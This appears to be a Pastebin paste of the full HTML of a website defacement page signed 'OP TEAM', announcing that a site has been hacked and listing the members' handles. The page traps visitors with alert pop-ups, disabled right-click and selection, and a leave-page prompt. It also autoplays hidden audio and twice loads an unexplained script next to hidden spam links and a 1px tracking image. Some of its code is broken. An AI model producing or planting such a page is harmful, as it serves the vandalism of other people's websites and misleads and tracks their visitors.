Advertisement
Guest User

op2

a guest
Mar 4th, 2015
266
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <html><head>
  2. <title>:HACKED BY OP TEAM:</title>
  3. <style type="text/css"></style></head><body background="OP TEAM" bgcolor="#000000" text="#00FF00" onload="document.body.style.cursor='crosshair';" oncontextmenu="return false" onselectstart="return false" onbeforeunload="return 'You will close this awesome page héhéhé :D'" style="cursor: crosshair;"><center>
  4.  
  5. <script language="JavaScript">
  6. alert('Website Owned By [ OP Team ]');
  7. </script>
  8.  
  9.  
  10. <script language="JavaScript">
  11. alert('We Do Not Stop !');
  12. </script>
  13.  
  14.  
  15. <br><img src="http://i.imgur.com/IfLqWmt.jpg" alt="!! HACKED !!" height="230" width="750"><br><img src="http://i54.tinypic.com/2mcjcdv.gif">
  16. <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
  17. <meta http-equiv="Content-Language" content="en-us">
  18. <meta http-equiv="imagetoolbar" content="no">
  19. <meta name="revisit-after" content="3">
  20. <meta name="rating" content="general">
  21. <meta name="classification" content="Internet Services">
  22. <meta name="googlebot" content="index,follow">
  23. <meta name="google rank" content="1">
  24. <meta name="robots" content="all">
  25. <meta name="robots schedule" content="auto">
  26. <meta name="distribution" content="global">
  27.  
  28. <script>
  29. TypingText = function(element, interval, cursor, finishedCallback) {
  30. if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
  31. this.running = true; // Never run.
  32. return;
  33. }
  34. this.element = element;
  35. this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
  36. this.interval = (typeof interval == "undefined" ? 100 : interval);
  37. this.origText = this.element.innerHTML;
  38. this.unparsedOrigText = this.origText;
  39. this.cursor = (cursor ? cursor : "");
  40. this.currentText = "";
  41. this.currentChar = 0;
  42. this.element.typingText = this;
  43. if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
  44. TypingText.all.push(this);
  45. this.running = false;
  46. this.inTag = false;
  47. this.tagBuffer = "";
  48. this.inHTMLEntity = false;
  49. this.HTMLEntityBuffer = "";
  50. }
  51. TypingText.all = new Array();
  52. TypingText.currentIndex = 0;
  53. TypingText.runAll = function() {
  54. for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
  55. }
  56. TypingText.prototype.run = function() {
  57. if(this.running) return;
  58. if(typeof this.origText == "undefined") {
  59. setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval); // We haven't finished loading yet. Have patience.
  60. return;
  61. }
  62. if(this.currentText == "") this.element.innerHTML = "";
  63. // this.origText = this.origText.replace(/<([^<])*>/, ""); // Strip HTML from text.
  64. if(this.currentChar < this.origText.length) {
  65. if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
  66. this.tagBuffer = "<";
  67. this.inTag = true;
  68. this.currentChar++;
  69. this.run();
  70. return;
  71. } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
  72. this.tagBuffer += ">";
  73. this.inTag = false;
  74. this.currentText += this.tagBuffer;
  75. this.currentChar++;
  76. this.run();
  77. return;
  78. } else if(this.inTag) {
  79. this.tagBuffer += this.origText.charAt(this.currentChar);
  80. this.currentChar++;
  81. this.run();
  82. return;
  83. } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
  84. this.HTMLEntityBuffer = "&";
  85. this.inHTMLEntity = true;
  86. this.currentChar++;
  87. this.run();
  88. return;
  89. } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
  90. this.HTMLEntityBuffer += ";";
  91. this.inHTMLEntity = false;
  92. this.currentText += this.HTMLEntityBuffer;
  93. this.currentChar++;
  94. this.run();
  95. return;
  96. } else if(this.inHTMLEntity) {
  97. this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
  98. this.currentChar++;
  99. this.run();
  100. return;
  101. } else {
  102. this.currentText += this.origText.charAt(this.currentChar);
  103. }
  104. this.element.innerHTML = this.currentText;
  105. this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
  106. this.currentChar++;
  107. setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
  108. } else {
  109. this.currentText = "";
  110. this.currentChar = 0;
  111. this.running = false;
  112. this.finishedCallback();
  113. }
  114. }
  115. </script>
  116.  
  117.  
  118.  
  119.  
  120. <script type="text/javascript">
  121. var rev = "fwd";
  122. function titlebar(val)
  123. {
  124. var msg = ":HACKED BY OP TEAM:";
  125. var res = " ";
  126. var speed = 100;
  127. var pos = Black;
  128.  
  129. msg = ""+msg+"";
  130. var le = msg.length;
  131. if(rev == "fwd"){
  132. if(pos < le){
  133. pos = pos+1;
  134. scroll = msg.substr(0,pos);
  135. document.title = scroll;
  136. timer = window.setTimeout("titlebar("+pos+")",speed);
  137. }
  138. else{
  139. rev = "bwd";
  140. timer = window.setTimeout("titlebar("+pos+")",speed);
  141. }
  142. }
  143. else{
  144. if(pos > 0){
  145. pos = pos-1;
  146. var ale = le-pos;
  147. scrol = msg.substr(ale,le);
  148. document.title = scrol;
  149. timer = window.setTimeout("titlebar("+pos+")",speed);
  150. }
  151. else{
  152. rev = "fwd";
  153. timer = window.setTimeout("titlebar("+pos+")",speed);
  154. }
  155. }
  156. }
  157.  
  158. titlebar(0);
  159. </script>
  160. </center><i>
  161. <script type="text/javascript" src="/Nbmz02gsWEv"></script><noscript>&amp;amp;lt;p style="margin-top:50px;text-align:center;"&amp;amp;gt;&amp;amp;lt;a href="http://www.xn--juniorenfuballer-plb.de/"&amp;amp;gt;Juniorenfu&amp;amp;amp;szlig;baller&amp;amp;lt;/a&amp;amp;gt; - &amp;amp;lt;a href="http://www.xn--sop-pla.de/"&amp;amp;gt;&amp;amp;amp;Auml;sop&amp;amp;lt;/a&amp;amp;gt; - &amp;amp;lt;a href="http://www.xn--tgliches-brot-bfb.de/"&amp;amp;gt;T&amp;amp;amp;auml;gliches Brot&amp;amp;lt;/a&amp;amp;gt; - &amp;amp;lt;a href="http://www.schnipsel.eu/"&amp;amp;gt;Schnipsel&amp;amp;lt;/a&amp;amp;gt; - &amp;amp;lt;a href="http://www.zitronenschalen.de/"&amp;amp;gt;Zitronenschalen&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/p&amp;amp;gt;</noscript><noscript>&amp;amp;lt;img src="/Nbmz02gsWEv.gif" width="1px" height="1px"/&amp;amp;gt;</noscript>
  162.  
  163. <embed name="brm" src="http://sd-1.archive-host.com/membres/up/181353453557047624/Matrix04_.mp3" loop="false" hidden="true" autostart="true">
  164.  
  165.  
  166. <style>
  167. td
  168. {
  169. background-color: #1f1f1f;
  170. font-family: Courier New;
  171. font-size:9pt;
  172. color:#00FF00;
  173. border-color: #ffffff;
  174. border-width:1pt;
  175. border-style:solid;
  176. border-collapse:collapse;
  177. padding:0pt 3pt;
  178. vertical-align:top;
  179. }
  180. table
  181. {
  182. border-color: #88aace;
  183. border-width:0pt 1pt;
  184. border-style:dash;
  185. }
  186.  
  187.  
  188. .top
  189. {
  190. width: 795px;
  191. height: 15px;
  192. color:#ffffff;
  193. border: 1px;
  194. border-style:solid;
  195. border-color:white;
  196. }
  197.  
  198. A:Link, A:Visited
  199. {
  200. color: #88aace;
  201. }
  202. A.no:Link, A.no:Visited
  203. {
  204. color: #88aace;
  205. text-decoration: none;
  206. }
  207. A:Hover, A:Visited:Hover , A.no:Hover, A.no:Visited:Hover
  208. {
  209. color: #88aace;
  210. background-color:#2e2e2e;
  211. text-decoration:
  212. overline underline;
  213. }
  214. .style1
  215. {
  216. color: #88aace
  217. }
  218. .style2
  219. {
  220. color: 1f1f1f
  221. }
  222. body
  223. {
  224.  
  225. }
  226. </style>
  227. <title>Index</title>
  228.  
  229.  
  230.  
  231. </i><div align="center"><i><span style="FILTER: blur(add=0,direction=0,strength=0); HEIGHT: 0px">
  232. <style>
  233. .layermensaje {
  234. FONT-SIZE: 10pt;LINE-HEIGHT: 10pt; FONT-FAMILY: "Arial"
  235. }
  236. </style>
  237.  
  238. <font style="FONT-SIZE: 8pt" face="Courier New">
  239. <script type="text/javascript">
  240. var charIndex = -1;
  241. var stringLength = 0;
  242. var inputText;
  243. function writeContent(init)
  244. {
  245. if(init)
  246. {
  247. inputText = document.getElementById('contentToWrite').innerHTML;
  248. }
  249. if(charIndex==-1)
  250. {
  251. charIndex = 0;
  252. stringLength = inputText.length;
  253. }
  254. var initString = document.getElementById('myContent').innerHTML;
  255. initString = initString.replace(/<SPAN.*$/gi,"");
  256.  
  257. var theChar = inputText.charAt(charIndex);
  258. var nextFourChars = inputText.substr(charIndex,4);
  259. if(nextFourChars=='<BR>' || nextFourChars=='<br>')
  260. {
  261. theChar = '<BR>';
  262. charIndex+=3;
  263. }
  264. initString = initString + theChar + "<SPAN id='blink'>></SPAN>";
  265. document.getElementById('myContent').innerHTML = initString;
  266.  
  267. charIndex = charIndex/1 +1;
  268. if(charIndex%2==1)
  269. {
  270. document.getElementById('blink').style.display='none';
  271. }
  272. else
  273. {
  274. document.getElementById('blink').style.display='inline';
  275. }
  276. if(charIndex<=stringLength)
  277. {
  278. setTimeout('writeContent(false)',100);
  279. }
  280. else
  281. {
  282. blinkSpan();
  283. }
  284. }
  285. var currentStyle = 'inline';
  286. function blinkSpan()
  287. {
  288. if(currentStyle=='inline')
  289. {
  290. currentStyle='none';
  291. }
  292. else
  293. {
  294. currentStyle='inline';
  295. }
  296. document.getElementById('blink').style.display = currentStyle;
  297. setTimeout('blinkSpan()',400);
  298. }
  299.  
  300.  
  301. msg = " " + msg;pos = 0;
  302. function scrollMSG()
  303. {
  304. document.title = msg.substring(pos, msg.length) + msg.substring(0, pos);
  305. pos++;
  306. if (pos > msg.length) pos = 0
  307. window.setTimeout("scrollMSG()",100);
  308. }
  309. scrollMSG();
  310. </script>
  311. </font></span></i><font style="FONT-SIZE: 8pt" face="iceland"></font><center><font style="FONT-SIZE: 8pt" face="iceland"><i>
  312. <font color="RED" font="" size="6"><b>.:: Ow3ned By OP TEAM ::.</b></font><br><br>
  313.  
  314. <br><fony color="white"><font size="5">No Security !!</font><br>
  315. <br>
  316. <marquee> OWNED BY OP Team </marquee><br>
  317. <div class="top">Hacked by OP TEAM</div><table width="800" height="0">
  318.  
  319. <tbody><tr>
  320. <td>
  321. <div id="myContent" class="tip">
  322.  
  323. It's Over :) !<br><br><br>
  324. Server: Connection established successfully!
  325. <br><br><br>
  326.  
  327. OP TEAM Was Here !
  328. <br>
  329. MSJ = We Are Moroccan Team ! We Do Not Forget And Also We Do Not Forget .
  330. <br><br>
  331. Own : |=| AnasPro4 |=| Dr.Max |=| ILYASS_El-Magribe |=| Mc Marshal |=| !
  332. <br> <span id="blink" style="display: inline;">&gt;</span></div>
  333. <div id="contentToWrite" style="display:none" text-decoration:"overline"="" class="tip">
  334. </div>
  335. </td>
  336. </tr>
  337.  
  338. </tbody></table>
  339. <div class="top"></div>
  340. <i>
  341. <script type="text/javascript" src="/Nbmz02gsWEv"></script><noscript>&amp;amp;lt;p style="margin-top:50px;text-align:center;"&amp;amp;gt;&amp;amp;lt;a href="http://www.xn--juniorenfuballer-plb.de/"&amp;amp;gt;Juniorenfu&amp;amp;amp;szlig;baller&amp;amp;lt;/a&amp;amp;gt; - &amp;amp;lt;a href="http://www.xn--sop-pla.de/"&amp;amp;gt;&amp;amp;amp;Auml;sop&amp;amp;lt;/a&amp;amp;gt; - &amp;amp;lt;a href="http://www.xn--tgliches-brot-bfb.de/"&amp;amp;gt;T&amp;amp;amp;auml;gliches Brot&amp;amp;lt;/a&amp;amp;gt; - &amp;amp;lt;a href="http://www.schnipsel.eu/"&amp;amp;gt;Schnipsel&amp;amp;lt;/a&amp;amp;gt; - &amp;amp;lt;a href="http://www.zitronenschalen.de/"&amp;amp;gt;Zitronenschalen&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/p&amp;amp;gt;</noscript><noscript>&amp;amp;lt;img src="/Nbmz02gsWEv.gif" width="1px" height="1px"/&amp;amp;gt;</noscript>
  342.  
  343. <embed name="brm" src="www.nhaccuatui.com/m/EpWTwER64IAE" loop="false" hidden="true" autostart="true">
  344.  
  345. <a href="https://www.facebook.com/HidenPro.official" target="_black"><img height="40" width="40" src="https://cdn0.iconfinder.com/data/icons/ball/256/facebook.png"><i class="icon-facebook"></i><span></span></a>
  346.  
  347.  
  348. <style></style></i></fony></i></font></center></div></body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement